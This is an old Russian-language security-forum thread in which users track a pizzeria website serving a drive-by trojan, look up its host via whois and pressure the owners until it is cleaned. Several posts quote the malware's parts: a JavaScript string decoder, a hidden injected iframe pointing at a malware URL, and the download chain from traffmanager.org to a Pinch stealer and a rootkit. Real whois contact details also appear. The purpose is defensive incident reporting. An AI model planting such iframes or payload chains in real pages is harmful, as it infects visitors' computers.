Просмотр полной версии : Троян на сайте. Владельцы игнорят..
Добрый день всем.
При входе на некоторый сайт KIS обнаружил Trojan-Clicker.HTML.IFrame.a. Я отписал хозяевам сайта об этом, чтоб они обратились к веб-мастеру. На это они ответили, что, мол, проблема решена, спасибо за содействие. Но на деле ничего они не предпринимали - KIS все также ругается... Я им написал еще раз, но они проигнорили. Можна как-то прикрыть доступ пользователей к их сайту? Компания работает в сфере услуг, и я не представляю, сколько людей заходит туда...
Можно к их провайдеру написать ;)Ну а если они сами провайдер- то бесполезно, разве что устроить DDos- но это не легально ;)Лучше название сайта тут указать, посмотрим. Сделай не активным линк.
Пиши хостеру. Пиши провайдеру. Можно ещё и регистраторам написать.
Как узнать их хостер, провайдерa и регистраторa? Я этот сайт в поисковике нашел (чтоб проверить пришлось даже второй раз искать. т.к. ссылку не сохранил...). Соответственно никакой инфы нету, кроме самого сайта..
Сайт с заразой: :http:pizzamaximus.com
Отчет KIS:
обнаружено: троянская программа Trojan-Clicker.HTML.IFrame.a URL: :http:traffmanager.org/tds/iframe.php
ЗЫ: Еще решил вести с ними борьбу: буду писать на разные целенаправленные форумы о них.. Пусть о них люди знают>:)
У меня похожая ситуация, детектится вирь на сайте, владельцы говорят, что все нормально. На вирустотале семеро его видят.
Скрипт я выдернул с сайта, он приложен.
IP 193.178.144.85
inetnum: 193.178.144.0 - 193.178.147.255
netname: IPROMO
descr: IpromoGroup Ltd.
descr: Web hosting and domain names registration
descr: PO Box 740
descr: Kiev
descr: 01034
country: UA
admin-c: II151-RIPE
tech-c: LH2956-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: IPROMO-MNT
mnt-routes: IPROMO-MNT
mnt-domains: IPROMO-MNT
source: RIPE # Filtered
role: IQ-INTER.NET IRHSP role object
address: PO Box 740
address: Kiev-34, Ukraine
address: 01034
phone: +44 078 03 04 05 06
phone: +38 067 704 78 26
phone: +38 044 24 707 24
e-mail:
[email protected]
admin-c: LH2956-RIPE
tech-c: LH2956-RIPE
nic-hdl: II151-RIPE
mnt-by: IPROMO-MNT
source: RIPE # Filtered
person: Lubes Haidamaka
address: PO Box 740
address: Kiev-34
address: Ukraine
phone: +38 044 24 707 24
e-mail:
[email protected]
nic-hdl: LH2956-RIPE
source: RIPE # Filtered
% Information related to '193.178.144.0/22AS21343'
route: 193.178.144.0/22
descr: IPromo Group
origin: AS21343
mnt-by: IPROMO-MNT
source: RIPE # Filtered
[email protected] - сюда писать?
ЗЫ: А как ты это сделал?! :pray: Научи, хочу все знать! :D
ЗЫ: А как ты это сделал?! :pray: Научи, хочу все знать! :D
http://ru.wikipedia.org/wiki/Whois
Сначала узнаём IP сайта. Для этого:
Пуск -- Выполнить-- ping -t ввв.pizzamaximus.com -- ОК
В чёрном окне смотрим айпишник.
Потом идём на какой-нибудь сайт, который по IP предоставляет сведения. Их в Интернете не один, и не два, а много. Я привык пользоваться http://old.antichat.ru/util/whois/
Забиваешь в строку ввода найденный IP и жмёшь кнопку Проверить.
Всё.
2Палыч: можна было не так подробно )) спасибо..
https://addons.mozilla.org/ru/firefox/addon/590 один клик заменят все телодвижения столь подробно описанные Палыч.
Ещё проще- whois.domaintools.com.
Спс.. одного метода вполне хватит)).. Не отвлекаемся от темы.. Ктото страницу смотрел?
Смотрел
http://www.virustotal.com/resultado.html?6ab50852bdd31c871e8595b38c8d13ff
P.S. По моему скрипту: кто-нибудь знает, как его расшифровать?
хм... у меня Каспер ругнулся, а в твоем отчете - не нашел...
А я проверял страницу pizza, может скрипт еще что подгружает с traffmanager.org
IP 193.178.144.85
Мне больше понравился отчет http://www.completewhois.com по hxxp://pizzamaximus.com:
DOMAIN: PIZZAMAXIMUS.COM
RSP: IMENA.ua
URL: http://www.imena.ua
created-date: 2007-02-02
updated-date: 2007-02-02
registration-expiration-date: 2008-02-02
owner-contact: P-JRF133
owner-fname: Jim
owner-lname: Fletcher
owner-street: rtertwert
owner-city: wqeqe
owner-zip: 99011
owner-country: UA
owner-phone: 23444
owner-email:
[email protected]
Добавлено через 10 минут
P.S. По моему скрипту: кто-нибудь знает, как его расшифровать?
Увы. Знаю только, что %3C%73%63%72... и т. д. представляют собой ASCII-коды. То есть то, что в "%", это следующее:
<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt (i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>
Спс.. одного метода вполне хватит)).. Не отвлекаемся от темы.. Ктото страницу смотрел?
Сайт pizzamaximus.com либо взломан, либо владелец сайта сам разместил iframe с ссылкой на сайт с эксплоитом (за деньги само собой :)).
traffmanager.org/tds/iframe.php - traffmanager.org/tds/ifram.php -traffmanager.org/sploit.php (зашифрован полиморфным криптером HtmlGuard). Если расшифровать содержимое сплоита, то можно видеть, что он должен загрузить файл и выполнить (если уязвим IE) - traffmanager.org/exp/svc.exe, который в свою очередь должен скачать:
traffmanager.org/new/get_exd.php?l=
traffmanager.org/new/get_exa.php?l=
traffmanager.org/new/get_exb.php?l=
traffmanager.org/new/get_exc.php?l=
traffmanager.org/new/get_exe.php?l=Russian
Некоторые файлы недоступны. Те что скачиваются - пинч (svc4.exe) и руткит ddos.exe (снимает хуки, регистрируется как сервис, после старта запускает IE. спрятанный из кернела и завершает свою работу).
Мне больше понравился отчет http://www.completewhois.com по hxxp://pizzamaximus.com:
Даааа... Дело ясное, что дело тёмное.
Во блин.. написал на
[email protected].. игнорят.. >:(
SuperBrat
25.07.2007, 19:09
У меня похожая ситуация, детектится вирь на сайте, владельцы говорят, что все нормально. На вирустотале семеро его видят.
Скрипт я выдернул с сайта, он приложен.
ЛК: чисто, AVIRA: ложный детект - убрали.
Скажите, каким образом происходит внедрение гадости на сайт? Дело в том, что во все страницы на моем сайте, которые называются default.htm было вписано в конце:
echo "";echo "";<iframe src="hxxp://www.radiodeejay.hr/forum/lang/inexed.htm" width=1 height=1></iframe>
Фокс от этого вис, а те, кто юзают IE говорили, что цепляли троян. Если бы не это echo "";echo ""; я бы может и не заметил так сразу. Я, конечно, снес эту строчку, но как это было сделано? Если вставили раз, смогут и второй при желании, ведь дыра-то осталась?
Как вариант, украдены пароли на ftp...
Как узнать их хостер, провайдерa и регистраторa? Я этот сайт в поисковике нашел (чтоб проверить пришлось даже второй раз искать. т.к. ссылку не сохранил...). Соответственно никакой инфы нету, кроме самого сайта..
Сайт с заразой: :http:pizzamaximus.com
Отчет KIS:
обнаружено: троянская программа Trojan-Clicker.HTML.IFrame.a URL: :http:traffmanager.org/tds/iframe.php
ЗЫ: Еще решил вести с ними борьбу: буду писать на разные целенаправленные форумы о них.. Пусть о них люди знают>:)
Факт наличия вредоноса подтверждаю.
Делаю всё от меня зависящее.
Добавлено через 11 минут
Как вариант, украдены пароли на ftp...
Атаки начинаются с открытой публикации e-mail - Как вариант... :)
Важное правило: НИКОГДА НЕ ПУБЛИКУЙТЕ СВОЙ E-MAIL ТАК, ЧТОБЫ МОШЕННИК ЗНАЛ О НЁМ!
Используйте форму обратной связи - этим вы огородите себя от чужого злого умысла.
Добавлено через 5 минут
ЛК: чисто, AVIRA: ложный детект - убрали.
KIS 7 - уже визжит....
Судя по их записи, детект - свежий!
SuperBrat
30.07.2007, 11:13
Shark, я отвечал на http://virusinfo.info/showpost.php?p=124203&postcount=5
А вы о чем? Там ЛК, AVIRA и др. признали ложный детект или чистоту образца.
Несогласные:
File 111.txt received on 07.30.2007 09:05:19 (CET)
Antivirus Version Last Update Result
CAT-QuickHeal 9.00 2007.07.28 JS_/Seeker
Fortinet 2.91.0.0 2007.07.30 JS/Inor.A!tr.dldr
Ikarus T3.1.1.8 2007.07.30 Trojan-Downloader.JS.Inor.A
Norman 5.80.02 2007.07.27 JS/Exploit_based.D
VBA32 3.12.2.1 2007.07.30 Trojan-Downloader.JS.Psyme.cv
Additional information
File size: 2738 bytes
MD5: 8d4ba06269770f80227f81332e06cfcb
SHA1: 47647815d32104b5e555b97a39f4622c8531dcfd
Отправлено письмо следующего содержания:
Кому:
[email protected]
Тема: Предупреждение об опасности ресурса.
Здравствуйте, marina.
Настоящим письмом довожу до вашего сведения, что сайт
:http: pizzamaximus.com представляет серъёзную опасность для пользователей!
Данный сайт используется для загрузки вредоносного ПО.
Считаю своим долгом напомнить Вам об уголовной ответственности
за "Неправомерный доступ к компьютерной Информации" (статья 272, ч.2)
(http://www.uk-rf.net/u_kodeks_28.php#273)
--
С уважением,
Игорь Голов mailto:
[email protected]
На тот момент у меня под рукой просто не было Нэзалэжного УК.
Бум работать! :)
Добавлено через 33 минуты
Во блин.. написал на
[email protected].. игнорят.. >:(
Возможно ответ тут (http://forum.sevastopol.info/viewtopic.php?p=867059)
2Shark я ж в личку отписывал... ну ниче.. не думаю, чтоб они полезли в УК проверять, что означает ст.272 ))))) за ссылку спасибо - интересно почитать.. На сайте пицерии действительно контакты и в столице, и в Севастополе..
ЗЫ:
Возможно ответ тут Ого.. ниасилил... оказывается про этот сайт уже известно.. а я думал, велосипед покажу ;).. а Флетчер/Флечер с его сайтом GST жжут !
пишите сюда лучше
http://mirohost.net/contact.phtml
т.к они у них
3.147.178.193.in-addr.arpa IN PTR hostingalexa.mirohost.net 86400s (1.00:00:00)
2 i_am отправил. посмотрим, что ответят (если ответят)
ann beta
01.08.2007, 19:19
Интересно, почему whois не может определить адрес и улицу владельца,
а вместо этого пишет белиберду.Как такое возможно???
Это не вхуис не может определить, а была введена заранее fake информация. Кстати по правилам ICANN если подать абузу такой домен будет заблокирован, в случае, если владелец в течении 15 дней не изменит информацию на корректную. Посему можно написать и в imena.com.ua и пригрозить пожаловаться в ИКАНН если не примут меры. Сработает. Естдомаинс очень быстро, например, на это реагирует
кстати исходя из whois history было 2 варианта
Whois History: 2 records have been archived since 2007-06-15
к сожалению посмотреть инфу по старому вхуису сейчас не могу, т.к нет подписки на этот сервис. Может в ближайшее время продлю и скажу
Получил ответ:
Проверили, на сайте троянов не нашли, но может владельцы перезалили сайт.
Добавка iframe - с ссылкой на вирусы - частое явление, так что вполне может быть.
Зашел на сайт - действительно уже ниче не подгружается. Значит, все таки "мотивация" помогла)
vBulletin® v4.2.5, Copyright ©2000-2024, Jelsoft Enterprises Ltd. Перевод: zCarot